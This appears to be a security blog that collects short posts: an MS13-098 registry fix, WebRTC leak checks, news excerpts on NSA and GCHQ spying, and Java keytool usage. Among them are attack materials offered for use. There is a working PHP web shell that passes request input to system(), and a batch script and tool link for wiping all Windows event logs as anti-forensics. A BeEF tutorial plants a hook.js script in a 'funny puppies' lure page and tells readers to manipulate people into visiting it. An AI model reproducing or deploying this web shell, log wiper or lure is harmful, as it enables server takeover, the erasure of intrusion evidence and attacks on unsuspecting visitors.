Clear All Windows System Logs – AntiForensics

Clear All Windows System Logs using ClearLogs (wevtutil.exe).

wevtutil
Enables you to retrieve information about event logs and publishers.
You can also use this command to install and uninstall event manifests,
to run queries, and to export, archive, and clear logs.

Development:
Built on .Net Framework 4.5.1 with Visual Studio 2013.

Download Page:
http://sourceforge.net/projects/clearlogs/

Source Page:
https://github.com/maldevel/clearlogs

List Mutex names on your system

1. Download Handle by Mark Russinovich

1. Run cmd.exe as administrator

2. Type and execute:

handle -a | findstr Mutant

Enable Windows Authenticode signature verification

Microsoft Security Bulletin MS13-098

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user or application runs or installs a specially crafted, signed portable executable (PE) file on an affected system.

This security update is rated Critical for all supported releases of Windows.

The security update addresses the vulnerability by modifying how the WinVerifyTrust function handles Windows Authenticode signature verification for portable executable files. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the vulnerability later in this bulletin.

https://technet.microsoft.com/library/security/ms13-098

 

For 32-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note You must restart the system for your changes to take effect.

 

For 64-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification64.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note You must restart the system for your changes to take effect.

 

Impact of enabling the functionality changes included in the MS13-098 update. Non-conforming binaries will appear unsigned and, therefore, be rendered untrusted.

https://technet.microsoft.com/library/security/2915720

 

Tracking techniques are getting “deeper”…

As people are getting more and more aware of possible security risks, the well known surveillance firms find deeper and lower-level ways for getting access to your data.

With just a few days difference, we are hearing about possible spying firmware on our hard drives and stolen encryption keys for our SIM cards!

Pretty interesting…

 

Russian Researchers Expose Breakthrough U.S. Spying Program | 2015/02/16

(Reuters) – The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world’s computers, according to cyber researchers and former operatives.

That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations.

Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0)

… [read the whole article here]

 

The Great SIM Heist | 2015/02/19

AMERICAN AND BRITISH spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

… [read the whole article here]

How to use BeEF – Quick Tutorial

BeEF – The Browser Exploitation Framework
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Tutorial

1. Start Apache service if not running

service apache2 start

Starting Apache2 Service

2. Navigate to /var/www/ directory and remove any apache default files and folders.

3. Create an empty index.html file

Empty Index File

4. Create a folder and name it for ex. funnypuppies

5. Download and store a picture inside funnypuppies folder. The picture should contain a picture of funny puppies!

funny puppies

6. Create an index.html file inside funnypuppies folder.

7. Add the following html code in your index.html file.

Funny Puppies<script src="http://your.ip.address:3000/hook.js"></script><img src="funnypuppies.jpg" alt="" />

Html Code

8. Open BeEF. GoTo Application -> Kali Linux -> Exploitation Tools -> BeEF XSS Framework -> beef

BeEF

9. Your browser will open the address, http://127.0.0.1:3000/ui/authentication. Default BeEF username: beef, and password: beef.

BeEF Panel

10. Now you have to manipulate people to open your link, http:\\your.external.ip.address\funnypuppies.jpg. Who ever visit the link, her browser will appear in BeEF’s tree.

BeEF

Enjoy

WebRTC Vulnerability leaks Real IP Address

WebRTC Vulnerability leaks Real IP Address of VPN User.

This security flaw can reveal your real IP address, even if you’re using a VPN, and it’s easy to exploit.

To check if you are safe or not:

> Visit https://diafygi.github.io/webrtc-ips/ while you are connected to your vpn.

> If your real IP address is in the results of the test then your browser is leaking your IP.

To prevent this from happening:

For Chrome Users:
> Install this addon, https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf?hl=en.

For Firefox Users:
> Open about:config
> Locate media.peerconnection.enabled
> Set it to false

To confirm that WebRTC is disabled:

> Visit https://www.browserleaks.com/webrtc

How the NSA is tracking people

http://apps.washingtonpost.com/g/page/national/how-the-nsa-is-tracking-people-right-now/634/?tid=sm_fb

Create a Java Certificate

keytool.exe -genkey -keyalg algorithm -alias my_alias -keystore myfilename.jks -storepass my_password -validity my_days -keysize my_size
Options:
 -alias <alias>                  alias name of the entry to process
 -keyalg <keyalg>                key algorithm name
 -keysize <keysize>              key bit size
 -sigalg <sigalg>                signature algorithm name
 -destalias <destalias>          destination alias
 -dname <dname>                  distinguished name
 -startdate <startdate>          certificate validity start date/time
 -ext <value>                    X.509 extension
 -validity <valDays>             validity number of days
 -keypass <arg>                  key password
 -keystore <keystore>            keystore name
 -storepass <arg>                keystore password
 -storetype <storetype>          keystore type
 -providername <providername>    provider name
 -providerclass <providerclass>  provider class name
 -providerarg <arg>              provider argument
 -providerpath <pathlist>        provider classpath
 -v                              verbose output
 -protected                      password through protected mechanism

Example:

keytool.exe -genkey -keyalg RSA -alias myjavacert -keystore mykeystore.jks -storepass 123456qwerty -validity 365 -keysize 2048

A quick and dirty php web shell

<?php
if(isset($_REQUEST['cmd'])){
	echo "Command: <span style='color:red;'><b>".$_REQUEST['cmd']."</b></span> executed.";
	echo "<pre style='border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;'>";
	$cmd = ($_REQUEST['cmd']);
	system($cmd);
	echo "</ pre>";
	die;
}

Clear All Windows Logs

1) Create a .bat file
2) Append the following:

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

3)Run as administrator